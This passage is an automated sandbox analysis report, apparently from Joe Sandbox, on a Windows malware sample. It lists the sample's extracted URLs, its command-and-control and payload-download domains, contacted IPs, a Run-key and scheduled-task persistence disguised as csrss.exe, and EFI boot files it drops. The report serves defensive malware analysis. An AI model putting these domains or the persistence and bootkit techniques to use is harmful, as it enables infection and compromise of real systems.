                          • Avira URL Cloud: safe
                          unknown
                          http://search.msn.com/msnbcsrss.exefalse
                            high
                            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpfalse
                              high
                              https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:csrss.exefalse
                              • URL Reputation: safe
                              unknown
                              https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpfalse
                                high
                                https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125561dyvctHqv1.exe, 0000000C.00000002.332244873.0000000016058000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412239285.00000000168D0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421820882.0000000016858000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.421014108.0000000016814000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.google.com/bot.html)tls:csrss.exefalse
                                    high
                                    https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://server3.trumops.comc=e3acbc4a527610e5&uuid=server3.trumops.com:443server3.trumops.com:443tcpcsrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://gohnot.com/546468561c5f48a95f3eb178d8283c2eccsrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://help.yacsrss.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmpfalse
                                      high
                                      https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS1dyvctHqv1.exe, 00000000.00000002.302703514.00000000160BA000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmpfalse
                                        high
                                        http://gohnot.com/546468561c5f48a95f3eb178d8283c2ecsrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.381033593.000000001694A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://builtwith.com/biup)csrss.exefalse
                                          high
                                          http://www.exabot.com/go/robot)Opera/9.80csrss.exefalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.bingmapsportal.comsvchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmpfalse
                                            high
                                            https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.comcsrss.exe, 00000011.00000003.380425564.00000000169E8000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.comTcsrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.379621696.0000000016A86000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000008.00000003.312103721.00000168B0C41000.00000004.00000001.sdmpfalse
                                              high
                                              https://trumops.comhttps://retoti.comcsrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpfalse
                                                high
                                                https://trumops.com/api/install-failureinvalidcsrss.exefalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.baidu.com/search/spider.htm)MobileSafari/600.1.41dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                  high
                                                  http://yandex.com/bots)Opera/9.51csrss.exefalse
                                                    high
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://%s.xboxlive.comsvchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      low
                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://t0.tiles.ditu.live.com/tiles/gen.virtuasvchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://https://_bad_pdb_file.pdb1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.bloglines.com)Fcsrss.exefalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://dynamic.tsvchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://newscommer.com/app/app.execsrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmptrue
                                                              • URL Reputation: malware
                                                              unknown
                                                              http://www.google.com/feedfetcher.html)HKLMcsrss.exefalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://blockchain.infoindexcsrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.avantbrowser.com)MOT-V9mm/00.62csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    low
                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://search.msn.com/msnbot.htm)pkcs7:1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                        high
                                                                        http://www.alexa.com/help/webmasters;csrss.exefalse
                                                                          high
                                                                          https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://gais.cs.ccu.edu.tw/robot.php)Gulpercsrss.exefalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exeHcsrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.spidersoft.com)Wget/1.9csrss.exefalse
                                                                                  • Avira URL Cloud: safe
                                                                                  low
                                                                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://retoti.com1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://trumops.comif-unmodified-sinceillegal1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://devlog.gregarius.net/docs/ua)Linkscsrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://server3.trumops.comcsrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://grub.org)Mozilla/5.0csrss.exefalse
                                                                                        • Avira URL Cloud: safe
                                                                                        low
                                                                                        http://www.everyfeed.ccsrss.exefalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://turnitin.com/robot/crawlerinfo.html)gentracebackcsrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                                          high
                                                                                          https://trumops.com1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559317775.0000000016838000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://server3.trumops.com/api/pollserver3.trumops.comcsrss.exe, 00000011.00000003.381350341.0000000016910000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.googlebot.com/bot.html)Linkscsrss.exefalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://search.msn.com/msnbot.htm)net/http:csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                                                high
                                                                                                https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.comcsrss.exe, 00000011.00000003.381724707.00000000168AC000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://server3.trumops.com/api/poll62csrss.exe, 00000011.00000002.560072123.00000000168E6000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://search.msn.com/msnbot.htm)msnbot/1.1csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                                                  high
                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.archive.org/details/archive.org_bot)Opera/9.80csrss.exefalse
                                                                                                        high
                                                                                                        http://www.google.com/bot.html)Mozilla/5.0csrss.exefalse
                                                                                                          high
                                                                                                          https://server3.trumops.com3server3.trumops.com:443server3.trumops.com:443ontcpserver3.trumops.comcsrss.exe, 00000011.00000002.560806655.00000000169E8000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          low
                                                                                                          https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://archive.org/details/archive.org_bot)Mozilla/5.0csrss.exefalse
                                                                                                                high
                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDDelegateExecuteC:csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://misc.yahoo.com.cn/hecsrss.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://crl.g1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://www.baidu.com/search/spidecsrss.exefalse
                                                                                                                    high
                                                                                                                    http://yandex.com/bots)Opera/9.80csrss.exefalse
                                                                                                                      high
                                                                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://sitescore.aiValuecsrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://activity.windows.comsvchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.google.com/adsbot.html)Encounteredcsrss.exefalse
                                                                                                                            high
                                                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              low

                                                                                                                              Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              172.67.139.144
                                                                                                                              server3.trumops.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              104.21.34.203
                                                                                                                              unknownUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              172.67.207.136
                                                                                                                              runmodes.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              172.67.196.11
                                                                                                                              gohnot.comUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse

                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              192.168.2.1

                                                                                                                              General Information

                                                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                              Analysis ID:520213
                                                                                                                              Start date:11.11.2021
                                                                                                                              Start time:20:34:10
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 14m 20s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Sample file name:1dyvctHqv1 (renamed file extension from none to exe)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:53
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:1
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.rans.troj.evad.winEXE@78/18@12/5
                                                                                                                              EGA Information:Failed
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 96.7% (good quality ratio 50%)
                                                                                                                              • Quality average: 39.2%
                                                                                                                              • Quality standard deviation: 43.3%
                                                                                                                              HCA Information:Failed
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              Warnings:
                                                                                                                              Show All
                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.35.236.56, 184.30.21.144
                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              20:35:07API Interceptor9x Sleep call for process: 1dyvctHqv1.exe modified
                                                                                                                              20:35:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EmptySmoke "C:\Windows\rss\csrss.exe"
                                                                                                                              20:35:28API Interceptor9x Sleep call for process: csrss.exe modified
                                                                                                                              20:35:31Task SchedulerRun new task: csrss path: C:\Windows\rss\csrss.exe
                                                                                                                              20:35:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EmptySmoke "C:\Windows\rss\csrss.exe"

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              No context

                                                                                                                              Domains

                                                                                                                              No context

                                                                                                                              ASN

                                                                                                                              No context

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              B:\EFI\Boot\old.efi (copy)
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:MS-DOS executable
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7680
                                                                                                                              Entropy (8bit):4.486535052248291
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                              MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                              SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                              SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                                              SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:MS-DOS executable
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7680
                                                                                                                              Entropy (8bit):4.486535052248291
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                              MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                              SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                              SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                                              SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\EFI\Boot\EfiGuardDxe.efi
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:MS-DOS executable
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):279552
                                                                                                                              Entropy (8bit):4.553173975914215
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                                                                                              MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                                                                                              SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                                                                                              SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                                                                                              SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\EFI\Boot\bootx64.efi
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:MS-DOS executable
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7680
                                                                                                                              Entropy (8bit):4.486535052248291
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                              MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                              SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                              SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                                              SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Reputation:unknown
                                                                                                                              Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                                                                                              Process:C:\Windows\rss\csrss.exe
                                                                                                                              File Type:MS-DOS executable
                                                                                                                              Category:dropped
